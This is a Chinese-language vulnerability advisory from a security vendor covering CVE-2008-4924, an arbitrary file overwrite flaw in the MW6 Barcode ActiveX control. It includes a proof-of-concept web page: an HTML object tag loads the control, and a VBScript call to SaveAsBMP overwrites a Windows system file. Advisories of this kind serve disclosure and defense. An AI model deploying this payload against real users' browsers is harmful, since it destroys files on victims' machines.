安全研究
安全漏洞
MW6 Barcode ActiveX控件任意文件覆盖漏洞
发布日期:2008-10-29
更新日期:2008-10-30
受影响系统:
MW6 Technologies Barcode ActiveX 3.0.0.1描述:
BUGTRAQ ID: 31979
CVE(CAN) ID: CVE-2008-4924
MW6 Barcode ActiveX是用于创建一维条码的工具。
MW6 Barcode ActiveX没有正确地过滤对SaveAsBMP()和SaveAsWMF()方式所传送的输入参数:
Sub SaveAsWMF (
ByVal FileName As String
)
Sub SaveAsWMF (
ByVal FileName As String
)
如果用户受骗访问了恶意网页并向上述方式传送了超长的FileName参数的话,就可能导致覆盖系统上的任意文件。
<*来源:Dr.Pantagon
链接:http://www.milw0rm.com/exploits/6871
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<object classid='clsid:14D09688-CFA7-11D5-995A-005004CE563B' id='target' >
<param name="BackColor" value="16777215">
<param name="BarHeight" value="1,5">
<param name="BarColor" value="0">
<param name="BorderStyle" value="0">
<param name="CheckDigit" value="0">
<param name="CheckDigitToText" value="0">
<param name="CodaBarStartChar" value="65">
<param name="CodaBarStopChar" value="66">
<param name="Data" value="1234">
<param name="NarrowBarWidth" value="0,07">
<param name="Orientation" value="0">
<param name="ShowText" value="1">
<param name="Supplement" value="">
<param name="SupplementGap" value="0,5">
<param name="SupplementType" value="0">
<param name="SymbologyType" value="2">
<param name="UPCESystem" value="0">
<param name="Wide2NarrowRatio" value="2">
<param name="FontName" value="Arial">
<param name="FontItalic" value="0">
<param name="FontStrikeOut" value="0">
<param name="FontUnderline" value="0">
<param name="FontWeight" value="400">
<param name="FontHeight" value="24">
</object>
<script language='vbscript'>
targetFile = "C:\WINDOWS\system32\Barcode.dll"
prototype = "Sub SaveAsBMP ( ByVal FileName As String )"
memberName = "SaveAsBMP"
progid = "BARCODELib.MW6Barcode"
argCount = 1
arg1="c:\windows\system_.ini"
target.SaveAsBMP arg1
'target.SaveAsWMF arg1
</script>
建议:
厂商补丁:
MW6 Technologies
----------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.mw6tech.com/
浏览次数:2511
严重程度:0(网友投票)
绿盟科技给您安全的保障